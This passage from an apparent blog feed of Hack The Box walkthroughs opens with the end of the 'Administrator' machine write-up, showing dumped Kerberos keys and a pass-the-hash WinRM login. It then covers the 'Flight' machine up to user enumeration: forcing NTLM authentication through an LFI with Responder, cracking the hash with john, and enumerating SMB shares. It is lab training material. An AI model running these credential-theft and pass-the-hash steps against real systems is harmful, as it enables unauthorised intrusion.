class="line">administrator.htb\michael:aes256-cts-hmac-sha1-96:409e1ae3a9e1d8531a7d9d2d83d0aa02f0d6c5a5435c621e3304b294fe32d4e9</span><br><span class="line">administrator.htb\michael:aes128-cts-hmac-sha1-96:97cbb32467f5971a85b6beb994d12fdb</span><br><span class="line">administrator.htb\michael:des-cbc-md5:e6851cb51f078ae3</span><br><span class="line">administrator.htb\benjamin:aes256-cts-hmac-sha1-96:85c174190270b6f36bd1318ea26a22c603901a57c78f3316c96f2a334b28107f</span><br><span class="line">administrator.htb\benjamin:aes128-cts-hmac-sha1-96:df0b408d253e548c4ec180a082e3a593</span><br><span class="line">administrator.htb\benjamin:des-cbc-md5:f7013ec492139dc4</span><br><span class="line">administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4</span><br><span class="line">administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218</span><br><span class="line">administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51</span><br><span class="line">administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f</span><br><span class="line">administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f</span><br><span class="line">administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb</span><br><span class="line">administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6</span><br><span class="line">administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade</span><br><span class="line">administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf</span><br><span class="line">administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82</span><br><span class="line">administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e</span><br><span class="line">administrator.htb\emma:des-cbc-md5:3249fba89813ef5d</span><br><span class="line">DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb</span><br><span class="line">DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d</span><br><span class="line">DC$:des-cbc-md5:f483547c4325492a</span><br><span class="line">[*] Cleaning up... </span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div></p><h3 id="Administrator"><a href="#Administrator" class="headerlink" title="Administrator"></a>Administrator</h3>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator crackmapexec winrm administrator.htb -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e</span><br><span class="line">SMB         administrator.htb 5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)</span><br><span class="line">HTTP        administrator.htb 5985   DC               [*] http://administrator.htb:5985/wsman</span><br><span class="line">WINRM       administrator.htb 5985   DC               [+] administrator.htb\Administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!)</span><br><span class="line">➜  Administrator </span><br></pre></td></tr></table></figure></div>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Hack The Box" scheme="http://example.com/categories/Hack-The-Box/"/>
    
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Hack The Box" scheme="http://example.com/tags/Hack-The-Box/"/>
    
    <category term="Impacket" scheme="http://example.com/tags/Impacket/"/>
    
    <category term="bloodyAD" scheme="http://example.com/tags/bloodyAD/"/>
    
  </entry>
  
  <entry>
    <title>Flight - Hack The Box</title>
    <link href="http://example.com/2024/11/15/Flight-HackTheBox/"/>
    <id>http://example.com/2024/11/15/Flight-HackTheBox/</id>
    <published>2024-11-15T11:02:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><p>Flight is a hard Windows machine that starts with a website with two different virtual hosts. One of them is vulnerable to LFI and allows an attacker to retrieve an NTLM hash. Once cracked, the obtained clear text password will be sprayed across a list of valid usernames to discover a password re-use scenario. Once the attacker has SMB access as the user <code>s.moon</code> he is able to write to a share that gets accessed by other users. Certain files can be used to steal the NTLMv2 hash of the users that access the share. Once the second hash is cracked the attacker will be able to write a reverse shell in a share that hosts the web files and gain a shell on the box as low privileged user. Having credentials for the user <code>c.bum</code>, it will be possible to gain a shell as this user, which will allow the attacker to write an <code>aspx</code> web shell on a web site that is hosted locally and by using chisel we can forward that port and get into our machine and we can get a shell and by using SetImpersoante privilege we can escalate to Administrator.</p><h4 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h4><p>Starting with nmap scan:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight nmap -v 10.129.228.120 -sCV -oA nmap-out</span><br><span class="line">Nmap scan report for 10.129.228.120</span><br><span class="line">Host is up (0.25s latency).</span><br><span class="line">Not shown: 988 filtered tcp ports (no-response)</span><br><span class="line">PORT     STATE SERVICE       VERSION</span><br><span class="line">53/tcp   open  domain        Simple DNS Plus</span><br><span class="line">80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)</span><br><span class="line">| http-methods: </span><br><span class="line">|   Supported Methods: OPTIONS HEAD GET POST TRACE</span><br><span class="line">|_  Potentially risky methods: TRACE</span><br><span class="line">|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1</span><br><span class="line">|_http-title: g0 Aviation</span><br><span class="line">88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-15 17:35:47Z)</span><br><span class="line">135/tcp  open  msrpc         Microsoft Windows RPC</span><br><span class="line">139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)</span><br><span class="line">445/tcp  open  microsoft-ds?</span><br><span class="line">464/tcp  open  kpasswd5?</span><br><span class="line">593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp  open  tcpwrapped</span><br><span class="line">3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)</span><br><span class="line">3269/tcp open  tcpwrapped</span><br><span class="line">Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   3:1:1: </span><br><span class="line">|_    Message signing enabled and required</span><br><span class="line">| smb2-time: </span><br><span class="line">|   date: 2024-11-15T17:36:17</span><br><span class="line">|_  start_date: N/A</span><br><span class="line">|_clock-skew: 5h30m00s</span><br><span class="line"></span><br><span class="line">NSE: Script Post-scanning.</span><br><span class="line">Initiating NSE at 07:07</span><br><span class="line">Completed NSE at 07:07, 0.00s elapsed</span><br><span class="line">Initiating NSE at 07:07</span><br><span class="line">Completed NSE at 07:07, 0.00s elapsed</span><br><span class="line">Initiating NSE at 07:07</span><br><span class="line">Completed NSE at 07:07, 0.00s elapsed</span><br><span class="line">Read data files from: /usr/share/nmap</span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 101.60 seconds</span><br><span class="line">           Raw packets sent: 2001 (88.020KB) | Rcvd: 48 (3.028KB)</span><br><span class="line">➜  Flight </span><br></pre></td></tr></table></figure></div><p>I found that port 80 was open, indicating an HTTP service. Since port 80 typically hosts web servers I navigated to the address <a class="link"   href="http://10.129.228.120/" >http://10.129.228.120<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/HTB/Flight/flight-main-page.png"                                     ></p><p>After browsing the website on port 80, I didn’t find anything interesting. I used ffuf to fuzz for potential subdomains.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight ffuf -u &quot;http://flight.htb/&quot; -H &quot;Host: FUZZ.flight.htb&quot; -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fl 155</span><br><span class="line"></span><br><span class="line">        /&#x27;___\  /&#x27;___\           /&#x27;___\       </span><br><span class="line">       /\ \__/ /\ \__/  __  __  /\ \__/       </span><br><span class="line">       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      </span><br><span class="line">        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      </span><br><span class="line">         \ \_\   \ \_\  \ \____/  \ \_\       </span><br><span class="line">          \/_/    \/_/   \/___/    \/_/       </span><br><span class="line"></span><br><span class="line">       v2.1.0-dev</span><br><span class="line">________________________________________________</span><br><span class="line"></span><br><span class="line"> :: Method           : GET</span><br><span class="line"> :: URL              : http://flight.htb/</span><br><span class="line"> :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt</span><br><span class="line"> :: Header           : Host: FUZZ.flight.htb</span><br><span class="line"> :: Follow redirects : false</span><br><span class="line"> :: Calibration      : false</span><br><span class="line"> :: Timeout          : 10</span><br><span class="line"> :: Threads          : 40</span><br><span class="line"> :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500</span><br><span class="line"> :: Filter           : Response lines: 155</span><br><span class="line">________________________________________________</span><br><span class="line"></span><br><span class="line">school                  [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 214ms]</span><br></pre></td></tr></table></figure></div><p>After fuzzing, I discovered a hidden virtual host: <code>school.flight.htb</code><br><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/HTB/Flight/school-main-page.png"                                     ></p><p>Upon enumerating i found a parameter <code>index.php?view=</code>, since it a Windows machine i started responder and crafted url like this:<br><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/HTB/Flight/responder.png"                                     ></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight sudo responder -I tun0</span><br><span class="line">[sudo] password for kali: </span><br><span class="line">                                         __</span><br><span class="line">  .----.-----.-----.-----.-----.-----.--|  |.-----.----.</span><br><span class="line">  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|</span><br><span class="line">  |__| |_____|_____|   __|_____|__|__|_____||_____|__|</span><br><span class="line">                   |__|</span><br><span class="line"></span><br><span class="line">           NBT-NS, LLMNR &amp; MDNS Responder 3.1.5.0</span><br><span class="line"></span><br><span class="line">  To support this project:</span><br><span class="line">  Github -&gt; https://github.com/sponsors/lgandx</span><br><span class="line">  Paypal  -&gt; https://paypal.me/PythonResponder</span><br><span class="line"></span><br><span class="line">  Author: Laurent Gaffie (laurent.gaffie@gmail.com)</span><br><span class="line">  To kill this script hit CTRL-C</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[SMB] NTLMv2-SSP Client   : 10.129.228.120</span><br><span class="line">[SMB] NTLMv2-SSP Username : flight\svc_apache</span><br><span class="line">[SMB] NTLMv2-SSP Hash     : svc_apache::flight:ea2a3ecfc8a500f8:304E4054C5D7CEC910A1BD84BE2F91D2:0101000000000000001677B53037DB01DC2646E0FBD583200000000002000800490049004B00460001001E00570049004E002D004400500036004F004B004C0034004E0049003200360004003400570049004E002D004400500036004F004B004C0034004E004900320036002E00490049004B0046002E004C004F00430041004C0003001400490049004B0046002E004C004F00430041004C0005001400490049004B0046002E004C004F00430041004C0007000800001677B53037DB010600040002000000080030003000000000000000000000000030000084B4169240A50F43AB98F19FBE4B105A949C2733F3B4C011FCA04B28C025E5020A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00320035000000000000000000</span><br></pre></td></tr></table></figure></div><p>In just a second i got a hit on my responder with <code>svc_apache</code> hash, and i used john to crack password.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight john hash --wordlist=/usr/share/wordlists/rockyou.txt</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press &#x27;q&#x27; or Ctrl-C to abort, almost any other key for status</span><br><span class="line">S@Ss!K@*t13      (svc_apache)     </span><br><span class="line">1g 0:00:00:04 DONE (2024-11-15 07:35) 0.2421g/s 2582Kp/s 2582Kc/s 2582KC/s SADSAM..S42150461</span><br><span class="line">Use the &quot;--show --format=netntlmv2&quot; options to display all of the cracked passwords reliably</span><br><span class="line">Session completed.</span><br></pre></td></tr></table></figure></div><p>After cracking i got password of <code>svc_apache:S@Ss!K@*t13</code>, with that creds i enumerated smb shares and got few shares.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight smbclient -L \\\\flight.htb\\ -U svc_apache</span><br><span class="line">Password for [WORKGROUP\svc_apache]:</span><br><span class="line"></span><br><span class="line">        Sharename       Type      Comment</span><br><span class="line">        ---------       ----      -------</span><br><span class="line">        ADMIN$          Disk      Remote Admin</span><br><span class="line">        C$              Disk      Default share</span><br><span class="line">        IPC$            IPC       Remote IPC</span><br><span class="line">        NETLOGON        Disk      Logon server share </span><br><span class="line">        Shared          Disk      </span><br><span class="line">        SYSVOL          Disk      Logon server share </span><br><span class="line">        Users           Disk      </span><br><span class="line">        Web             Disk      </span><br><span class="line">Reconnecting with SMB1 for workgroup listing.</span><br><span class="line">do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                                                                                                                                       </span><br><span class="line">Unable to connect with SMB1 -- no workgroup available                                                                                                                                                                                       </span><br><span class="line">➜  Flight smbclient \\\\flight.htb\\Users -U svc_apache </span><br><span class="line">Password for [WORKGROUP\svc_apache]:</span><br><span class="line">Try &quot;help&quot; to get a list of possible commands.</span><br><span class="line">smb: \&gt; ls</span><br><span class="line">  .                                  DR        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  ..                                 DR        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  .NET v4.5                           D        0  Thu Sep 22 15:28:03 2022</span><br><span class="line">  .NET v4.5 Classic                   D        0  Thu Sep 22 15:28:02 2022</span><br><span class="line">  Administrator                       D        0  Mon Oct 31 14:34:00 2022</span><br><span class="line">  All Users                       DHSrn        0  Sat Sep 15 03:28:48 2018</span><br><span class="line">  C.Bum                               D        0  Thu Sep 22 16:08:23 2022</span><br><span class="line">  Default                           DHR        0  Tue Jul 20 15:20:24 2021</span><br><span class="line">  Default User                    DHSrn        0  Sat Sep 15 03:28:48 2018</span><br><span class="line">  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018</span><br><span class="line">  Public                             DR        0  Tue Jul 20 15:23:25 2021</span><br><span class="line">  svc_apache                          D        0  Fri Oct 21 14:50:21 2022</span><br><span class="line"></span><br><span class="line">                5056511 blocks of size 4096. 1253840 blocks available</span><br><span class="line">smb: \&gt; cd C.Bum</span><br><span class="line">smb: \C.Bum\&gt; ls</span><br><span class="line">NT_STATUS_ACCESS_DENIED listing \C.Bum\*</span><br><span class="line">smb: \C.Bum\&gt; cd ../svc_apache\</span><br><span class="line">smb: \svc_apache\&gt; ls</span><br><span class="line">  .                                   D        0  Fri Oct 21 14:50:21 2022</span><br><span class="line">  ..                                  D        0  Fri Oct 21 14:50:21 2022</span><br><span class="line">  AppData                            DH        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Application Data                DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Cookies                         DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Desktop                            DR        0  Sat Sep 15 03:19:00 2018</span><br><span class="line">  Documents                          DR        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Downloads                          DR        0  Sat Sep 15 03:19:00 2018</span><br><span class="line">  Favorites                          DR        0  Sat Sep 15 03:19:00 2018</span><br><span class="line">  Links                              DR        0  Sat Sep 15 03:19:00 2018</span><br><span class="line">  Local Settings                  DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Music                              DR        0  Sat Sep 15 03:19:00 2018</span><br><span class="line">  My Documents                    DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  NetHood                         DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  NTUSER.DAT                        AHn   262144  Mon Oct 31 23:26:27 2022</span><br><span class="line">  ntuser.dat.LOG1                   AHS   124928  Thu Sep 22 16:16:56 2022</span><br><span class="line">  ntuser.dat.LOG2                   AHS   124928  Thu Sep 22 16:16:56 2022</span><br><span class="line">  NTUSER.DAT&#123;1c3790b4-b8ad-11e8-aa21-e41d2d101530&#125;.TM.blf    AHS    65536  Thu Sep 22 16:17:08 2022</span><br><span class="line">  NTUSER.DAT&#123;1c3790b4-b8ad-11e8-aa21-e41d2d101530&#125;.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Thu Sep 22 16:16:56 2022</span><br><span class="line">  NTUSER.DAT&#123;1c3790b4-b8ad-11e8-aa21-e41d2d101530&#125;.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Thu Sep 22 16:16:56 2022</span><br><span class="line">  ntuser.ini                         HS       20  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Pictures                           DR        0  Sat Sep 15 03:19:00 2018</span><br><span class="line">  PrintHood                       DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Recent                          DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Saved Games                         D        0  Sat Sep 15 03:19:00 2018</span><br><span class="line">  SendTo                          DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Start Menu                      DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Templates                       DHSrn        0  Thu Sep 22 16:16:56 2022</span><br><span class="line">  Videos                             DR        0  Sat Sep 15 03:19:00 2018</span><br><span class="line"></span><br><span class="line">                5056511 blocks of size 4096. 1253840 blocks available</span><br><span class="line">smb: \svc_apache\&gt; cd Desktop</span><br><span class="line">smb: \svc_apache\Desktop\&gt; ls</span><br><span class="line">  .                                  DR        0  Sat Sep 15 03:19:00 2018</span><br><span class="line">  ..                                 DR        0  Sat Sep 15 03:19:00 2018</span><br><span class="line">                5056511 blocks of size 4096. 1253840 blocks available</span><br><span class="line">smb: \&gt; exit</span><br><span class="line">➜  Flight smbclient \\\\flight.htb\\Web -U svc_apache </span><br><span class="line">Password for [WORKGROUP\svc_apache]:</span><br><span class="line">Try &quot;help&quot; to get a list of possible commands.</span><br><span class="line">smb: \&gt; ls</span><br><span class="line">  .                                   D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  ..                                  D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  flight.htb                          D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  school.flight.htb                   D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line"></span><br><span class="line">                5056511 blocks of size 4096. 1253840 blocks available</span><br><span class="line">smb: \&gt; cd school.flight.htb\</span><br><span class="line">smb: \school.flight.htb\&gt; ls</span><br><span class="line">  .                                   D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  ..                                  D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  about.html                          A     1689  Mon Oct 24 23:54:45 2022</span><br><span class="line">  blog.html                           A     3618  Mon Oct 24 23:53:59 2022</span><br><span class="line">  home.html                           A     2683  Mon Oct 24 23:56:58 2022</span><br><span class="line">  images                              D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  index.php                           A     2092  Thu Oct 27 03:59:25 2022</span><br><span class="line">  lfi.html                            A      179  Thu Oct 27 03:55:16 2022</span><br><span class="line">  styles                              D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line"></span><br><span class="line">                5056511 blocks of size 4096. 1253840 blocks available</span><br><span class="line">smb: \school.flight.htb\&gt; cd ../flight.htb\</span><br><span class="line">ls</span><br><span class="line">smb: \flight.htb\&gt; ls</span><br><span class="line">  .                                   D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  ..                                  D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  css                                 D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  images                              D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line">  index.html                          A     7069  Thu Feb 24 00:58:10 2022</span><br><span class="line">  js                                  D        0  Fri Nov 15 13:27:00 2024</span><br><span class="line"></span><br><span class="line">                5056511 blocks of size 4096. 1253584 blocks available</span><br><span class="line">smb: \flight.htb\&gt; exit</span><br><span class="line">➜  Flight smbclient \\\\flight.htb\\Shared -U svc_apache</span><br><span class="line">Password for [WORKGROUP\svc_apache]:</span><br><span class="line">Try &quot;help&quot; to get a list of possible commands.</span><br><span class="line">smb: \&gt; ls</span><br><span class="line">  .                                   D        0  Fri Oct 28 16:21:28 2022</span><br><span class="line">  ..                                  D        0  Fri Oct 28 16:21:28 2022</span><br><span class="line"></span><br><span class="line">                5056511 blocks of size 4096. 1253584 blocks available</span><br><span class="line">smb: \&gt; exit</span><br></pre></td></tr></table></figure></div><p>Coudn’t find anything interesting from shares, so moving forward to find other users.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">➜  Flight nxc smb 10.129.228.120 -u &#x27;svc_apache&#x27; -p &#x27;S@Ss!K@*t13&#x27;                                           </span><br><span class="line">SMB         10.129.228.120  445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.129.228.120  445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 </span><br><span class="line">➜  Flight nxc smb 10.129.228.120 -u &#x27;svc_apache&#x27; -p &#x27;S@Ss!K@*t13&#x27; --users</span><br><span class="line">SMB         10.129.228.120  445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.129.228.120  445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 </span><br><span class="line">SMB         10.129.228.120  445    G0               -Username-                    -Last PW Set-       -BadPW- -Description-                                               </span><br><span class="line">SMB         10.129.228.120  445    G0               Administrator                 2022-09-22 20:17:02 0       Built-in account for administering the computer/domain </span><br><span class="line">SMB         10.129.228.120  445    G0               Guest                         &lt;never&gt;             0       Built-in account for guest access to the computer/domain </span><br><span class="line">SMB         10.129.228.120  445    G0               krbtgt                        2022-09-22 19:48:01 0       Key Distribution Center Service Account </span><br><span class="line">SMB         10.129.228.120  445    G0               S.Moon                        2022-09-22 20:08:22 0       Junion Web Developer </span><br><span class="line">SMB         10.129.228.120  445    G0               R.Cold                        2022-09-22 20:08:22 0       HR Assistant </span><br><span class="line">SMB         10.129.228.120  445    G0               G.Lors                        2022-09-22 20:08:22 0       Sales manager </span><br><span class="line">SMB         10.129.228.120  445    G0               L.Kein                        2022-09-22 20:08:22 0       Penetration tester </span><br><span class="line">SMB         10.129.228.120  445    G0               M.Gold   